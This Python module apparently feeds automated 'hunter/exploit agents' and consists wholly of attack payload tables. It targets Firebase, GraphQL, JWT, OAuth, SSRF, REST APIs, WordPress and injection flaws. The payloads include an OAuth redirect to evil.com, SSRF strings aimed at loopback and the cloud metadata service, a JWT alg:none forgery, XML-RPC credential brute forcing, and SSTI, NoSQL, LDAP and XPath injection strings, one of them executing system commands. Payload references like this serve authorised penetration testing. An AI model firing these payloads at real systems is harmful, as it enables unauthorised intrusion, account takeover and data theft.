"""
bypass_tables.py — Reference tables of known bypass patterns.
Used by hunter/exploit agents for targeted testing.
"""

FIREBASE_BYPASSES = [
    {"name": "Open Database Rules", "description": "Firebase RTB with no auth rules",
     "detection": "Try reading /{path}.json without auth",
     "exploit": "curl https://{project}.firebaseio.com/{path}.json",
     "severity": "critical"},
    {"name": "Storage Bucket Public", "description": "GCS bucket readable without auth",
     "detection": "Try https://storage.googleapis.com/{bucket}/",
     "exploit": "gsutil ls gs://{bucket}/",
     "severity": "high"},
]

GRAPHQL_BYPASSES = [
    {"name": "Introspection Query", "description": "Dump full schema via introspection",
     "query": '{"query":"{__schema{types{name fields{name type{name}}}}}"}',
     "detection": "Response contains __schema with types",
     "severity": "medium"},
    {"name": "Batch Query DoS", "description": "Multiple queries in single request",
     "query": '{"query":"{user(id:1){name}} {user(id:2){name}} ..."}',
     "detection": "Server processes all queries without rate limiting",
     "severity": "medium"},
    {"name": "Nested Depth Attack", "description": "Deeply nested queries cause DoS",
     "query": '{"query":"{ user { friends { friends { friends { name } } } } }"}',
     "detection": "Server timeout or excessive resource usage",
     "severity": "high"},
    {"name": "IDOR via Mutations", "description": "Modify other users via GraphQL mutations",
     "query": '{"query":"mutation { updateUser(id:2, name:\\"hacked\\") { id } }"}',
     "detection": "Other user's data modified",
     "severity": "critical"},
]

JWT_BYPASSES = [
    {"name": "None Algorithm", "description": "Set alg to none, strip signature",
     "header": '{"alg":"none","typ":"JWT"}',
     "detection": "Server accepts token with alg:none",
     "severity": "critical"},
    {"name": "HS256 Confusion", "description": "Sign RS256 token with HS256 using public key",
     "description_detail": "If server uses RS256 but accepts HS256, sign with public key as secret",
     "detection": "Token signed with HS256 using public key accepted",
     "severity": "critical"},
    {"name": "Signature Stripping", "description": "Remove signature entirely",
     "detection": "Server accepts token without signature verification",
     "severity": "critical"},
    {"name": "Kid Injection", "description": "Inject path traversal in kid header",
     "header": '{"alg":"HS256","kid":"../../dev/null"}',
     "detection": "Server uses kid to load key file — path traversal possible",
     "severity": "high"},
]

OAUTH_BYPASSES = [
    {"name": "Redirect URI Manipulation", "description": "Change redirect_uri to attacker domain",
     "exploit": "Replace redirect_uri with https://evil.com/callback",
     "detection": "OAuth provider redirects to attacker domain with auth code",
     "severity": "critical"},
    {"name": "State Parameter Bypass", "description": "No CSRF protection via state parameter",
     "exploit": "Reuse auth code without state validation",
     "detection": "Auth code accepted without matching state",
     "severity": "high"},
    {"name": "Scope Escalation", "description": "Request broader scopes than granted",
     "exploit": "Add scope=admin to authorization request",
     "detection": "Elevated scopes granted without user consent",
     "severity": "critical"},
]

SSRF_BYPASSES = [
    {"name": "IPv6 Loopback", "description": "Use IPv6 representation of localhost",
     "payload": "http://[::1]", "target": "127.0.0.1 bypass"},
    {"name": "Decimal IP", "description": "Use decimal representation of IP",
     "payload": "http://2130706433", "target": "127.0.0.1 (decimal)"},
    {"name": "Octal IP", "description": "Use octal representation",
     "payload": "http://0177.0.0.1", "target": "127.0.0.1 (octal)"},
    {"name": "URL Parser Confusion", "description": "Exploit URL parser differences",
     "payload": "http://evil.com#@127.0.0.1", "target": "Parser sees evil.com, browser sees 127.0.0.1"},
    {"name": "Redirect Bypass", "description": "Use redirect to reach internal network",
     "payload": "http://evil.com/redirect?to=http://127.0.0.1", "target": "Follow redirect to internal"},
    {"name": "DNS Rebinding", "description": "Domain resolves to internal IP on second lookup",
     "payload": "http://rebind.attacker.com", "target": "First resolve: external, second: 127.0.0.1"},
    {"name": "Cloud Metadata", "description": "Access cloud instance metadata",
     "payload": "http://169.254.169.254/latest/meta-data/", "target": "AWS/GCP/Alibaba metadata"},
    {"name": "Encoded IP", "description": "URL-encoded IP bypass",
     "payload": "http://%31%32%37%2e%30%2e%30%2e%31", "target": "127.0.0.1 (URL encoded)"},
]

REST_API_BYPASSES = [
    {"name": "Mass Assignment", "description": "Inject extra fields in PUT/PATCH",
     "exploit": "Add role=admin or is_admin=true to update request",
     "detection": "Privilege escalation via extra fields",
     "severity": "critical"},
    {"name": "HTTP Method Override", "description": "Bypass method restrictions via headers",
     "exploit": "Add X-HTTP-Method-Override: DELETE to GET request",
     "detection": "Server executes overridden method",
     "severity": "high"},
    {"name": "Content-Type Confusion", "description": "Send XML instead of JSON",
     "exploit": "Change Content-Type to application/xml with XML payload",
     "detection": "Server parses XML (XXE possible)",
     "severity": "high"},
    {"name": "API Version Bypass", "description": "Older API version has weaker auth",
     "exploit": "Try /v1/ endpoint if /v2/ requires auth",
     "detection": "v1 endpoint accessible without authentication",
     "severity": "high"},
    {"name": "Parameter Pollution", "description": "Duplicate parameters",
     "exploit": "?id=1&id=2 — server may use first or last",
     "detection": "Unexpected behavior with duplicate params",
     "severity": "medium"},
    {"name": "Rate Limit Bypass", "description": "Bypass rate limiting via headers",
     "exploit": "Add X-Forwarded-For: 1.2.3.4 (rotating IPs)",
     "detection": "Rate limit not enforced with spoofed headers",
     "severity": "medium"},
]

WORDPRESS_BYPASSES = [
    {"name": "XML-RPC Brute Force", "description": "Use xmlrpc.php for credential stuffing",
     "url": "/xmlrpc.php", "method": "POST",
     "body": "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>password</value></param></params></methodCall>",
     "severity": "high"},
    {"name": "REST API User Enum", "description": "Enumerate users via REST API",
     "url": "/wp-json/wp/v2/users", "detection": "Returns list of usernames",
     "severity": "medium"},
    {"name": "wp-config.php Exposure", "description": "Check for backup config files",
     "urls": ["/wp-config.php.bak", "/wp-config.php.old", "/wp-config.php~", "/.wp-config.php.swp"],
     "severity": "critical"},
]

INJECTION_BYPASSES = [
    {"name": "Second-Order SQLi", "description": "Inject via stored data, not direct input",
     "technique": "Store malicious payload in DB via registration, trigger later via different query",
     "severity": "critical"},
    {"name": "NoSQL Injection", "description": "MongoDB operator injection",
     "payloads": ['{"username":{"$gt":""},"password":{"$gt":""}}',
                  '{"$where":"this.password == \'admin\'"}'],
     "severity": "critical"},
    {"name": "SSTI Jinja2", "description": "Server-Side Template Injection in Jinja2",
     "payloads": ["{{7*7}}", "{{config}}", "{{''.__class__.__mro__[1].__subclasses__()}}"],
     "detection": "49 in response, or config object leaked",
     "severity": "critical"},
    {"name": "SSTI Twig", "description": "Server-Side Template Injection in Twig",
     "payloads": ["{{7*7}}", "{{_self}}", "{{['id']|filter('system')}}"],
     "severity": "critical"},
    {"name": "Header Injection (CRLF)", "description": "Inject CRLF in headers",
     "payload": "value%0d%0aInjected-Header: malicious",
     "detection": "Response contains injected header",
     "severity": "high"},
    {"name": "LDAP Injection", "description": "Manipulate LDAP queries",
     "payloads": ["*)(objectClass=*)", "*()|&'", "admin)(&)"],
     "severity": "high"},
    {"name": "XPath Injection", "description": "Manipulate XPath queries",
     "payloads": ["' or '1'='1", "' or 1=1 or ''='", "'] | //user[password] | //["],
     "severity": "high"},
]
